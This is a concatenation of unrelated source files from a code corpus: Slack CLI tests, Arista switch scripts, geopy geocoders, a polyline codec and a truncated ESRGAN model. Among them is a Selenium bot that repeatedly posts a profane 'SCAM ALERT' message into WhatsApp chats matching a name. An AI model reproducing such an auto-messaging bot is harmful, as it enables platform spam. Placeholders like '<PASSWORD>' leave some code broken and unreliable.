"https://ghostbusters.slack.com/archives/C1H9RESGA/p135854651500008"
)
assert result is not None
assert result == expected
```
#### File: slck-cli/tests/test_user.py
```python
from typing import List
import pytest
from mock_slack_client import MockSlackClient
from slck.user import User, UserManager, UserNotFoundError
class TestUserManager:
def test__initialize(self) -> None:
client: MockSlackClient = MockSlackClient()
UserManager(client)
def test__list_users(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
users: List[User] = user_manager.list()
assert len(users) == 2
def test__find_user_by_id(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(id="W07QCRPA4")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__find_user_by_name(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(name="glinda")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__find_user_by_real_name(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
user: User = user_manager.find(real_name="<NAME>")[0]
assert user.id == "W07QCRPA4"
assert user.name == "glinda"
assert user.real_name == "<NAME>"
def test__cannot_find_user(self) -> None:
client: MockSlackClient = MockSlackClient()
user_manager: UserManager = UserManager(client)
with pytest.raises(UserNotFoundError):
user_manager.find(real_name="No One")
``` |
{
"source": "joeyame/ScammerSpammer",
"score": 3
} |
#### File: joeyame/ScammerSpammer/__main__.py
```python
import os
import threading
from time import sleep
from selenium import webdriver
from selenium.common.exceptions import JavascriptException
# To get started we navigate into the module directory
os.chdir(__file__[:__file__.rfind("/")])
##################################################
# This section is where we set up the program
print("Initializing ScammerRevenge...")
# Change these settings as desired
settings = {}
settings["headless"] = False
settings["spamChatName"] = "HY Investment"
settings["enableScamAlertMessage"] = True
# Print current setup
print("Current settings:")
print("Headless mode:", settings["headless"])
print("Searching for chats that contain:", settings["spamChatName"])
print("Enable scam alert messages:", settings["enableScamAlertMessage"])
#################################################################
# This section is what actually drives the spamming thread
# threading.Event() allows us to tell the spamming thread to stop
spam2 = threading.Event()
def startSpamming1():
# Set up webdriver options
options = webdriver.ChromeOptions()
options.add_argument(f"user-data-dir=./chromeProfiles/fuckscammers")
options.add_argument(f"headless={settings['headless']}")
driver1 = webdriver.Chrome( f'./chromedriver', options=options )
# Get the whatsapp website
driver1.get("https://web.whatsapp.com")
# Wait for the chat list to become available
elem = driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div")')
while elem is None:
elem = driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div")')
elem.click()
# While we aren't supposed to stop...
while not spam2.is_set():
try:
# Build list of scam chats:
schats = []
for child in driver1.execute_script('return document.querySelector("#pane-side > div:nth-child(1) > div > div").children'):
if settings["spamChatName"] in child.get_attribute('innerText'):
schats.append(child)
# Switch between the chats
for child in schats:
child.click()
sleep(0.2)
# Only send a chat message if we are supposed to
if(settings["enableScamAlertMessage"]):
# Also, only send the chat in response to a message that does not contain the string "SCAM ALERT" and does not contain the word "Left"
if(not "SCAM ALERT" in driver1.execute_script('return document.querySelector("#main > div._1LcQK > div > div._33LGR > div.y8WcF").lastElementChild.innerText')) and (not "left" in driver1.execute_script('return document.querySelector("#main > div._1LcQK > div > div._33LGR > div.y8WcF").lastElementChild.innerText')):
# Get input box
msgin = driver1.execute_script('return document.querySelector("#main > footer > div._2BU3P.tm2tP.copyable-area > div > span:nth-child(2) > div > div._2lMWa > div.p3_M1 > div > div._13NKt.copyable-text.selectable-text")')
# Type in the scam alert message
msgin.send_keys("*SCAM ALERT!* Do not click on any links within this chat. These bastards *will STEAL your money!* Please block them immediately and revisit your privacy settings to ensure you never get added again. *SCAM ALERT!*\n")
# If there is a javascript exception rub it off and keep going.
except JavascriptException:
print("Javascript exception")
# Close the driver when we are done
driver1.close()
#################################################################
# Now we create the thread that runs the spambot and get it started
thread = threading.Thread(target=startSpamming1)
thread.start()
# Wait for user to press enter
input("Press enter to stop the program")
# Give the signal to shutdown the spambot
spam2.set()
# Pull thread into this one
thread.join()
# Done!
##################################################
``` |
{
"source": "joeyamosjohns/final_project_nhl_prediction_first_draft",
"score": 3
} |
#### File: src/modules/data_clean.py
```python
import pandas as pd
import numpy as np
def perc_null(X):
total = X.isnull().sum().sort_values(ascending=False)
data_types = X.dtypes
percent = (X.isnull().sum()/X.isnull().count()).sort_values(ascending=False)
missing_data = pd.concat([total, data_types, percent], axis=1, keys=['Total','Type' ,'Percent'])
return missing_data
#for X in data_frames:
# print(perc_null(X)['Total'].sum())
##goalie stats, skater stats, team_stats all have NaN ...
## I think missing vals are in df_mp ... deal later
``` |
{
"source": "joeyb182/pynet_ansible",
"score": 2
} |
#### File: pynet_ansible/byers-paid/week_7_exercise_1.py
```python
import pyeapi
from pprint import pprint
pynet_sw2 = pyeapi.connect_to("pynet-sw2") #this name is from the config file
output = pynet_sw2.enable("show interfaces") #the .enable indicates it's going to run it as enable mode...only looking for commands
def pyeapi_result(output):
'''
Return the 'result' value from the pyeapi output
'''
return output[0]['result']
s_i = pyeapi_result(output)
s_i = s_i['interfaces']
for k,v in s_i.items():
try:
inOct = v['interfaceCounters']['inOctets']
outOct = v['interfaceCounters']['outOctets']
print k,'\ninOctets: ' ,inOct,'\noutOctets: ' ,outOct,'\n'
except:
print 'no counters on: ' + k
```
#### File: pynet_ansible/byers-paid/week_7_exercise_2.py
```python
import pyeapi
from pprint import pprint
import argparse
# Argument parsing
parser = argparse.ArgumentParser(description="addition/removal of VLAN to Arista switch")
parser.add_argument("vlan_id", help="VLAN number to create or remove", action="store", type=int)
parser.add_argument("--name",help="Specify VLAN name",action="store",dest="vlan_name",type=str)
parser.add_argument("--remove", help="Remove the given VLAN ID", action="store_true")
cli_args = parser.parse_args()
vlan_id = cli_args.vlan_id
vlan_id = int(vlan_id)
remove = cli_args.remove
vlan_name = cli_args.vlan_name
pynet_sw2 = pyeapi.connect_to("pynet-sw2") #this name is from the config file
output = pynet_sw2.enable("show vlan") #the .enable indicates it's going to run it as enable mode...only looking for commands
def pyeapi_result(output):
'''
Return the 'result' value from the pyeapi output
'''
return output[0]['result']
s_v = pyeapi_result(output)
#this strips the returned data to JUST the vlans
s_v = s_v['vlans']
vlan_exists = False
cmds = []
#this iterates through the list of VLANs for our VLAN we specified to remove, and sets remove_the_vlan from False to True if it's there
for k,v in s_v.items():
k = int(k)
if k == vlan_id:
vlan_exists = True
vlan_id = str(vlan_id)
#update our command list (command) with removing the VLAN if it needs to go
if remove:
if vlan_exists == True:
temp_str = 'no vlan '+ vlan_id
cmds = [temp_str]
else:
print "the VLAN doesn't exist, can't delete it"
else: #otherwise check to see if it exists and don't add it or add it if it's not there
if vlan_exists == True:
print "the VLAN already exists, we can't create it"
else:
id_str = 'vlan '+ vlan_id
name_str = 'name '+ vlan_name
cmds = [id_str,name_str]
#issue our commands
pynet_sw2.config(cmds)
#write mem after done
pynet_sw2.enable("write memory")
``` |
{
"source": "joeybaba/incubator-superset",
"score": 2
} |
#### File: geopy/geocoders/algolia.py
```python
from geopy.compat import Request, urlencode
from geopy.geocoders.base import DEFAULT_SENTINEL, Geocoder
from geopy.location import Location
from geopy.point import Point
from geopy.util import logger
__all__ = ('AlgoliaPlaces',)
class AlgoliaPlaces(Geocoder):
"""Geocoder using the Algolia Places API.
Documentation at:
https://community.algolia.com/places/documentation.html
.. versionadded:: 1.22.0
"""
geocode_path = '/1/places/query'
reverse_path = '/1/places/reverse'
def __init__(
self,
app_id=None,
api_key=None,
domain='places-dsn.algolia.net',
format_string=None,
scheme=None,
timeout=DEFAULT_SENTINEL,
proxies=DEFAULT_SENTINEL,
user_agent=None,
ssl_context=DEFAULT_SENTINEL,
):
"""
:param str app_id: Unique application identifier. It's used to
identify you when using Algolia's API.
See https://www.algolia.com/dashboard.
:param str api_key: Algolia's user API key.
:param str domain: Currently it is ``'places-dsn.algolia.net'``,
can be changed for testing purposes.
:param str format_string:
See :attr:`geopy.geocoders.options.default_format_string`.
.. deprecated:: 1.22.0
:param str scheme:
See :attr:`geopy.geocoders.options.default_scheme`.
:param int timeout:
See :attr:`geopy.geocoders.options.default_timeout`.
:param dict proxies:
See :attr:`geopy.geocoders.options.default_proxies`.
:param str user_agent:
See :attr:`geopy.geocoders.options.default_user_agent`.
:type ssl_context: :class:`ssl.SSLContext`
:param ssl_context:
See :attr:`geopy.geocoders.options.default_ssl_context`.
"""
super(AlgoliaPlaces, self).__init__(
format_string=format_string,
scheme=scheme,
timeout=timeout,
proxies=proxies,
user_agent=user_agent,
ssl_context=ssl_context,
)
self.domain = domain.strip('/')
self.app_id = app_id
self.api_key = api_key
self.geocode_api = (
'%s://%s%s' % (self.scheme, self.domain, self.geocode_path)
)
self.reverse_api = (
'%s://%s%s' % (self.scheme, self.domain, self.reverse_path)
)
def geocode(
self,
query,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
type=None,
restrict_searchable_attributes=None,
limit=None,
language=None,
countries=None,
around=None,
around_via_ip=None,
around_radius=None,
x_forwarded_for=None,
):
"""
Return a location point by address.
:param str query: The address or query you wish to geocode.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param str type: Restrict the search results to a specific type.
Available types are defined in documentation:
https://community.algolia.com/places/api-clients.html#api-options-type
:param str restrict_searchable_attributes: Restrict the fields in which
the search is done.
:param int limit: Limit the maximum number of items in the
response. If not provided and there are multiple results
Algolia API will return 20 results by default. This will be
reset to one if ``exactly_one`` is True.
:param str language: If specified, restrict the search results
to a single language. You can pass two letters country
codes (ISO 639-1).
:param list countries: If specified, restrict the search results
to a specific list of countries. You can pass two letters
country codes (ISO 3166-1).
:param around: Force to first search around a specific
latitude longitude.
:type around: :class:`geopy.point.Point`, list or tuple of
``(latitude, longitude)``, or string as ``"%(latitude)s,
%(longitude)s"``.
:param bool around_via_ip: Whether or not to first search
around the geolocation of the user found via his IP address.
This is true by default.
:param around_radius: Radius in meters to search around the
latitude/longitude. Otherwise a default radius is
automatically computed given the area density.
:param str x_forwarded_for: Override the HTTP header X-Forwarded-For.
With this you can control the source IP address used to resolve
the geo-location of the user. This is particularly useful when
you want to use the API from your backend as if it was from your
end-users' locations.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
params = {
'query': self.format_string % query,
}
if type is not None:
params['type'] = type
if restrict_searchable_attributes is not None:
params['restrictSearchableAttributes'] = restrict_searchable_attributes
if limit is not None:
params['hitsPerPage'] = limit
if exactly_one:
params["hitsPerPage"] = 1
if language is not None:
params['language'] = language.lower()
if countries is not None:
params['countries'] = ','.join([c.lower() for c in countries])
if around is not None:
p = Point(around)
params['aroundLatLng'] = "%s,%s" % (p.latitude, p.longitude)
if around_via_ip is not None:
params['aroundLatLngViaIP'] = \
'true' if around_via_ip else 'false'
if around_radius is not None:
params['aroundRadius'] = around_radius
url = '?'.join((self.geocode_api, urlencode(params)))
request = Request(url)
if x_forwarded_for is not None:
request.add_header('X-Forwarded-For', x_forwarded_for)
if self.app_id is not None and self.api_key is not None:
request.add_header('X-Algolia-Application-Id', self.app_id)
request.add_header('X-Algolia-API-Key', self.api_key)
logger.debug('%s.geocode: %s', self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(request, timeout=timeout),
exactly_one,
language=language,
)
def reverse(
self,
query,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
limit=None,
language=None,
):
"""
Return an address by location point.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of ``(latitude,
longitude)``, or string as ``"%(latitude)s, %(longitude)s"``.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:param int limit: Limit the maximum number of items in the
response. If not provided and there are multiple results
Algolia API will return 20 results by default. This will be
reset to one if ``exactly_one`` is True.
:param str language: If specified, restrict the search results
to a single language. You can pass two letters country
codes (ISO 639-1).
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
location = self._coerce_point_to_string(query)
params = {
'aroundLatLng': location,
}
if limit is not None:
params['hitsPerPage'] = limit
if language is not None:
params['language'] = language
url = '?'.join((self.reverse_api, urlencode(params)))
request = Request(url)
if self.app_id is not None and self.api_key is not None:
request.add_header('X-Algolia-Application-Id', self.app_id)
request.add_header('X-Algolia-API-Key', self.api_key)
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
return self._parse_json(
self._call_geocoder(request, timeout=timeout),
exactly_one,
language=language,
)
@staticmethod
def _parse_feature(feature, language):
# Parse each resource.
latitude = feature.get('_geoloc', {}).get('lat')
longitude = feature.get('_geoloc', {}).get('lng')
if isinstance(feature['locale_names'], dict):
if language in feature['locale_names']:
placename = feature['locale_names'][language][0]
else:
placename = feature['locale_names']["default"][0]
else:
placename = feature['locale_names'][0]
return Location(placename, (latitude, longitude), feature)
@classmethod
def _parse_json(self, response, exactly_one, language):
if response is None or 'hits' not in response:
return None
features = response['hits']
if not len(features):
return None
if exactly_one:
return self._parse_feature(features[0], language=language)
else:
return [
self._parse_feature(feature, language=language) for feature in features
]
```
#### File: geopy/geocoders/ignfrance.py
```python
import warnings
import xml.etree.ElementTree as ET
from geopy.compat import (
HTTPBasicAuthHandler,
HTTPPasswordMgrWithDefaultRealm,
Request,
build_opener,
iteritems,
u,
urlencode,
)
from geopy.exc import ConfigurationError, GeocoderQueryError
from geopy.geocoders.base import DEFAULT_SENTINEL, Geocoder
from geopy.location import Location
from geopy.util import logger
__all__ = ("IGNFrance", )
class IGNFrance(Geocoder):
"""Geocoder using the IGN France GeoCoder OpenLS API.
Documentation at:
https://geoservices.ign.fr/documentation/geoservices/index.html
"""
xml_request = """<?xml version="1.0" encoding="UTF-8"?>
<XLS version="1.2"
xmlns="http://www.opengis.net/xls"
xmlns:gml="http://www.opengis.net/gml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.opengis.net/xls
http://schemas.opengis.net/ols/1.2/olsAll.xsd">
<RequestHeader srsName="epsg:4326"/>
<Request methodName="{method_name}"
maximumResponses="{maximum_responses}"
requestID=""
version="1.2">
{sub_request}
</Request>
</XLS>"""
api_path = '/%(api_key)s/geoportail/ols'
def __init__(
self,
api_key,
username=None,
password=<PASSWORD>,
referer=None,
domain='wxs.ign.fr',
scheme=None,
timeout=DEFAULT_SENTINEL,
proxies=DEFAULT_SENTINEL,
user_agent=None,
format_string=None,
ssl_context=DEFAULT_SENTINEL,
):
"""
:param str api_key: The API key required by IGN France API
to perform geocoding requests. You can get your key here:
https://geoservices.ign.fr/documentation/services-acces.html.
Mandatory. For authentication with referer
and with username/password, the api key always differ.
:param str username: When making a call need HTTP simple
authentication username. Mandatory if no referer set
:param str password: When making a call need HTTP simple
authentication password. Mandatory if no referer set
:param str referer: When making a call need HTTP referer.
Mandatory if no password and username
:param str domain: Currently it is ``'wxs.ign.fr'``, can
be changed for testing purposes for developer API
e.g ``'gpp3-wxs.ign.fr'`` at the moment.
:param str scheme:
See :attr:`geopy.geocoders.options.default_scheme`.
:param int timeout:
See :attr:`geopy.geocoders.options.default_timeout`.
:param dict proxies:
See :attr:`geopy.geocoders.options.default_proxies`.
:param str user_agent:
See :attr:`geopy.geocoders.options.default_user_agent`.
.. versionadded:: 1.12.0
:param str format_string:
See :attr:`geopy.geocoders.options.default_format_string`.
.. versionadded:: 1.14.0
.. deprecated:: 1.22.0
:type ssl_context: :class:`ssl.SSLContext`
:param ssl_context:
See :attr:`geopy.geocoders.options.default_ssl_context`.
.. versionadded:: 1.14.0
"""
super(IGNFrance, self).__init__(
format_string=format_string,
scheme=scheme,
timeout=timeout,
proxies=proxies,
user_agent=user_agent,
ssl_context=ssl_context,
)
# Catch if no api key with username and password
# or no api key with referer
if not ((api_key and username and password) or (api_key and referer)):
raise ConfigurationError('You should provide an api key and a '
'username with a password or an api '
'key with a referer depending on '
'created api key')
if (username and password) and referer:
raise ConfigurationError('You can\'t set username/password and '
'referer together. The API key always '
'differs depending on both scenarios')
if username and not password:
raise ConfigurationError(
'username and password must be set together'
)
self.api_key = api_key
self.username = username
self.password = password
self.referer = referer
self.domain = domain.strip('/')
api_path = self.api_path % dict(api_key=self.api_key)
self.api = '%s://%s%s' % (self.scheme, self.domain, api_path)
if username and password and referer is None:
self.addSimpleHTTPAuthHeader()
def geocode(
self,
query,
query_type='StreetAddress',
maximum_responses=25,
is_freeform=False,
filtering=None,
exactly_one=True,
timeout=DEFAULT_SENTINEL,
):
"""
Return a location point by address.
:param str query: The query string to be geocoded.
:param str query_type: The type to provide for geocoding. It can be
`PositionOfInterest`, `StreetAddress` or `CadastralParcel`.
`StreetAddress` is the default choice if none provided.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
:param str is_freeform: Set if return is structured with
freeform structure or a more structured returned.
By default, value is False.
:param str filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param bool exactly_one: Return one result or a list of results, if
available.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
query = self.format_string % query
# Check if acceptable query type
if query_type not in ['PositionOfInterest',
'StreetAddress',
'CadastralParcel']:
raise GeocoderQueryError("""You did not provided a query_type the
webservice can consume. It should be PositionOfInterest,
'StreetAddress or CadastralParcel""")
# Check query validity for CadastralParcel
if query_type == 'CadastralParcel' and len(query.strip()) != 14:
raise GeocoderQueryError("""You must send a string of fourteen
characters long to match the cadastre required code""")
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
{filtering}
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=maximum_responses
)
# Manage type change for xml case sensitive
if is_freeform:
is_freeform = 'true'
else:
is_freeform = 'false'
# Manage filtering value
if filtering is None:
filtering = ''
# Create query using parameters
request_string = xml_request.format(
is_freeform=is_freeform,
query=query,
query_type=query_type,
filtering=filtering
)
params = {
'xls': request_string
}
url = "?".join((self.api, urlencode(params)))
logger.debug("%s.geocode: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
is_freeform=is_freeform,
exactly_one=exactly_one
)
def reverse(
self,
query,
reverse_geocode_preference=('StreetAddress', ),
maximum_responses=25,
filtering='',
exactly_one=DEFAULT_SENTINEL,
timeout=DEFAULT_SENTINEL,
):
"""
Return an address by location point.
:param query: The coordinates for which you wish to obtain the
closest human-readable addresses.
:type query: :class:`geopy.point.Point`, list or tuple of ``(latitude,
longitude)``, or string as ``"%(latitude)s, %(longitude)s"``.
:param list reverse_geocode_preference: Enable to set expected results
type. It can be `StreetAddress` or `PositionOfInterest`.
Default is set to `StreetAddress`.
:param int maximum_responses: The maximum number of responses
to ask to the API in the query body.
:param str filtering: Provide string that help setting geocoder
filter. It contains an XML string. See examples in documentation
and ignfrance.py file in directory tests.
:param bool exactly_one: Return one result or a list of results, if
available.
.. versionchanged:: 1.14.0
Default value for ``exactly_one`` was ``False``, which differs
from the conventional default across geopy. Please always pass
this argument explicitly, otherwise you would get a warning.
In geopy 2.0 the default value will become ``True``.
:param int timeout: Time, in seconds, to wait for the geocoding service
to respond before raising a :class:`geopy.exc.GeocoderTimedOut`
exception. Set this only if you wish to override, on this call
only, the value set during the geocoder's initialization.
:rtype: ``None``, :class:`geopy.location.Location` or a list of them, if
``exactly_one=False``.
"""
if exactly_one is DEFAULT_SENTINEL:
warnings.warn('%s.reverse: default value for `exactly_one` '
'argument will become True in geopy 2.0. '
'Specify `exactly_one=False` as the argument '
'explicitly to get rid of this warning.' % type(self).__name__,
DeprecationWarning, stacklevel=2)
exactly_one = False
sub_request = """
<ReverseGeocodeRequest>
{reverse_geocode_preference}
<Position>
<gml:Point>
<gml:pos>{query}</gml:pos>
</gml:Point>
{filtering}
</Position>
</ReverseGeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='ReverseGeocodeRequest',
sub_request=sub_request,
maximum_responses=maximum_responses
)
for pref in reverse_geocode_preference:
if pref not in ('StreetAddress', 'PositionOfInterest'):
raise GeocoderQueryError(
'`reverse_geocode_preference` must contain '
'one or more of: StreetAddress, PositionOfInterest'
)
point = self._coerce_point_to_string(query, "%(lat)s %(lon)s")
reverse_geocode_preference = '\n'.join((
'<ReverseGeocodePreference>%s</ReverseGeocodePreference>' % pref
for pref
in reverse_geocode_preference
))
request_string = xml_request.format(
maximum_responses=maximum_responses,
query=point,
reverse_geocode_preference=reverse_geocode_preference,
filtering=filtering
)
url = "?".join((self.api, urlencode({'xls': request_string})))
logger.debug("%s.reverse: %s", self.__class__.__name__, url)
raw_xml = self._request_raw_content(url, timeout)
return self._parse_xml(
raw_xml,
exactly_one=exactly_one,
is_reverse=True,
is_freeform='false'
)
def addSimpleHTTPAuthHeader(self):
# TODO make this a private API
# Create Urllib request object embedding HTTP simple authentication
sub_request = """
<GeocodeRequest returnFreeForm="{is_freeform}">
<Address countryCode="{query_type}">
<freeFormAddress>{query}</freeFormAddress>
</Address>
</GeocodeRequest>
"""
xml_request = self.xml_request.format(
method_name='LocationUtilityService',
sub_request=sub_request,
maximum_responses=1
)
# Create query using parameters
request_string = xml_request.format(
is_freeform='false',
query='rennes',
query_type='PositionOfInterest'
)
params = {
'xls': request_string
}
top_level_url = "?".join((self.api, urlencode(params)))
password_mgr = HTTPPasswordMgrWithDefaultRealm()
# Add the username and password.
# If we knew the realm, we could use it instead of None.
password_mgr.add_password(
None,
top_level_url,
self.username,
self.password
)
handler = HTTPBasicAuthHandler(password_mgr)
# create "opener" (OpenerDirector instance)
opener = build_opener(handler)
# Install the opener.
# Now all calls to urllib.request.urlopen use our opener.
self.urlopen = opener.open
def _parse_xml(self,
page,
is_reverse=False,
is_freeform=False,
exactly_one=True):
"""
Returns location, (latitude, longitude) from XML feed
and transform to json
"""
# Parse the page
tree = ET.fromstring(page.encode('utf-8'))
# Clean tree from namespace to facilitate XML manipulation
def remove_namespace(doc, namespace):
"""Remove namespace in the document in place."""
ns = '{%s}' % namespace
ns = u(ns)
nsl = len(ns)
for elem in doc.iter():
if elem.tag.startswith(ns):
elem.tag = elem.tag[nsl:]
remove_namespace(tree, 'http://www.opengis.net/gml')
remove_namespace(tree, 'http://www.opengis.net/xls')
remove_namespace(tree, 'http://www.opengis.net/xlsext')
# Return places as json instead of XML
places = self._xml_to_json_places(tree, is_reverse=is_reverse)
if not places:
return None
if exactly_one:
return self._parse_place(places[0], is_freeform=is_freeform)
else:
return [
self._parse_place(
place,
is_freeform=is_freeform
) for place in places
]
@staticmethod
def _xml_to_json_places(tree, is_reverse=False):
"""
Transform the xml ElementTree due to XML webservice return to json
"""
select_multi = (
'GeocodedAddress'
if not is_reverse
else 'ReverseGeocodedLocation'
)
adresses = tree.findall('.//' + select_multi)
places = []
sel_pl = './/Address/Place[@type="{}"]'
for adr in adresses:
el = {}
el['pos'] = adr.find('./Point/pos')
el['street'] = adr.find('.//Address/StreetAddress/Street')
el['freeformaddress'] = adr.find('.//Address/freeFormAddress')
el['municipality'] = adr.find(sel_pl.format('Municipality'))
el['numero'] = adr.find(sel_pl.format('Numero'))
el['feuille'] = adr.find(sel_pl.format('Feuille'))
el['section'] = adr.find(sel_pl.format('Section'))
el['departement'] = adr.find(sel_pl.format('Departement'))
el['commune_absorbee'] = adr.find(sel_pl.format('CommuneAbsorbee'))
el['commune'] = adr.find(sel_pl.format('Commune'))
el['insee'] = adr.find(sel_pl.format('INSEE'))
el['qualite'] = adr.find(sel_pl.format('Qualite'))
el['territoire'] = adr.find(sel_pl.format('Territoire'))
el['id'] = adr.find(sel_pl.format('ID'))
el['id_tr'] = adr.find(sel_pl.format('ID_TR'))
el['bbox'] = adr.find(sel_pl.format('Bbox'))
el['nature'] = adr.find(sel_pl.format('Nature'))
el['postal_code'] = adr.find('.//Address/PostalCode')
el['extended_geocode_match_code'] = adr.find(
'.//ExtendedGeocodeMatchCode'
)
place = {}
def testContentAttrib(selector, key):
"""
Helper to select by attribute and if not attribute,
value set to empty string
"""
return selector.attrib.get(
key,
None
) if selector is not None else None
place['accuracy'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'accuracy')
place['match_type'] = testContentAttrib(
adr.find('.//GeocodeMatchCode'), 'matchType')
place['building'] = testContentAttrib(
adr.find('.//Address/StreetAddress/Building'), 'number')
place['search_centre_distance'] = testContentAttrib(
adr.find('.//SearchCentreDistance'), 'value')
for key, value in iteritems(el):
if value is not None:
place[key] = value.text
if value.text is None:
place[key] = None
else:
place[key] = None
# We check if lat lng is not empty and unpack accordingly
if place['pos']:
lat, lng = place['pos'].split(' ')
place['lat'] = lat.strip()
place['lng'] = lng.strip()
else:
place['lat'] = place['lng'] = None
# We removed the unused key
place.pop("pos", None)
places.append(place)
return places
def _request_raw_content(self, url, timeout):
"""
Send the request to get raw content.
"""
request = Request(url)
if self.referer is not None:
request.add_header('Referer', self.referer)
raw_xml = self._call_geocoder(
request,
timeout=timeout,
deserializer=None
)
return raw_xml
@staticmethod
def _parse_place(place, is_freeform=None):
"""
Get the location, lat, lng and place from a single json place.
"""
# When freeform already so full address
if is_freeform == 'true':
location = place.get('freeformaddress')
else:
# For parcelle
if place.get('numero'):
location = place.get('street')
else:
# When classic geocoding
# or when reverse geocoding
location = "%s %s" % (
place.get('postal_code', ''),
place.get('commune', ''),
)
if place.get('street'):
location = "%s, %s" % (
place.get('street', ''),
location,
)
if place.get('building'):
location = "%s %s" % (
place.get('building', ''),
location,
)
return Location(location, (place.get('lat'), place.get('lng')), place)
```
#### File: site-packages/polyline/codec.py
```python
import itertools
import six
import math
class PolylineCodec(object):
def _pcitr(self, iterable):
return six.moves.zip(iterable, itertools.islice(iterable, 1, None))
def _py2_round(self, x):
# The polyline algorithm uses Python 2's way of rounding
return int(math.copysign(math.floor(math.fabs(x) + 0.5), x))
def _write(self, output, curr_value, prev_value, factor):
curr_value = self._py2_round(curr_value * factor)
prev_value = self._py2_round(prev_value * factor)
coord = curr_value - prev_value
coord <<= 1
coord = coord if coord >= 0 else ~coord
while coord >= 0x20:
output.write(six.unichr((0x20 | (coord & 0x1f)) + 63))
coord >>= 5
output.write(six.unichr(coord + 63))
def _trans(self, value, index):
byte, result, shift = None, 0, 0
while byte is None or byte >= 0x20:
byte = ord(value[index]) - 63
index += 1
result |= (byte & 0x1f) << shift
shift += 5
comp = result & 1
return ~(result >> 1) if comp else (result >> 1), index
def decode(self, expression, precision=5, geojson=False):
coordinates, index, lat, lng, length, factor = [], 0, 0, 0, len(expression), float(10 ** precision)
while index < length:
lat_change, index = self._trans(expression, index)
lng_change, index = self._trans(expression, index)
lat += lat_change
lng += lng_change
coordinates.append((lat / factor, lng / factor))
if geojson is True:
coordinates = [t[::-1] for t in coordinates]
return coordinates
def encode(self, coordinates, precision=5, geojson=False):
if geojson is True:
coordinates = [t[::-1] for t in coordinates]
output, factor = six.StringIO(), int(10 ** precision)
self._write(output, coordinates[0][0], 0, factor)
self._write(output, coordinates[0][1], 0, factor)
for prev, curr in self._pcitr(coordinates):
self._write(output, curr[0], prev[0], factor)
self._write(output, curr[1], prev[1], factor)
return output.getvalue()
``` |
{
"source": "joeyballentine/ESRGAN",
"score": 2
} |
#### File: utils/architecture/RRDB.py
```python
import functools
import math
import re
from collections import OrderedDict
import torch
import torch.nn as nn
import utils.architecture.block as B
# Borrowed from https://github.com/rlaphoenix/VSGAN/blob/master/vsgan/archs/ESRGAN.py
# Which enhanced stuff that was already here
class RRDBNet(nn.Module):
def __init__(
self,
state_dict,
norm=None,
act: str = "leakyrelu",
upsampler: str = "upconv",
mode: str = "CNA",
) -> None:
"""
ESRGAN - Enhanced Super-Resolution Generative Adversarial Networks.
By <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
and <NAME>.
This is old-arch Residual in Residual Dense Block Network and is not
the newest revision that's available at github.com/xinntao/ESRGAN.
This is on purpose, the newest Network has severely limited the
potential use of the Network with no benefits.
This network supports model files from both new and old-arch.
Args:
norm: Normalization layer
act: Activation layer
upsampler: Upsample layer. upconv, pixel_shuffle
mode: Convolution mode
"""
super(RRDBNet, self).__init__()
self.state = state_dict
self.norm = norm
self.act = act
self.upsampler = upsampler
self.mode = mode
self.state_map = {
# currently supports old, new, and newer RRDBNet arch models
# ESRGAN, BSRGAN/RealSR, Real-ESRGAN
"model.0.weight": ("conv_first.weight",),
"model.0.bias": ("conv_first.bias",),
"model.1.sub./NB/.weight": ("trunk_conv.weight", "conv_body.weight"),
"model.1.sub./NB/.bias": ("trunk_conv.bias", "conv_body.bias"),
"model.3.weight": ("upconv1.weight", "conv_up1.weight"),
"model.3.bias": ("upconv1.bias", "conv_up1.bias"),
"model.6.weight": ("upconv2.weight", "conv_up2.weight"),
"model.6.bias": ("upconv2.bias", "conv_up2.bias"),
"model.8.weight": ("HRconv.weight", "conv_hr.weight"),
"model.8.bias": ("HRconv.bias", "conv_hr.bias"),
"model.10.weight": ("conv_last.weight",),
"model.10.bias": ("conv_last.bias",),
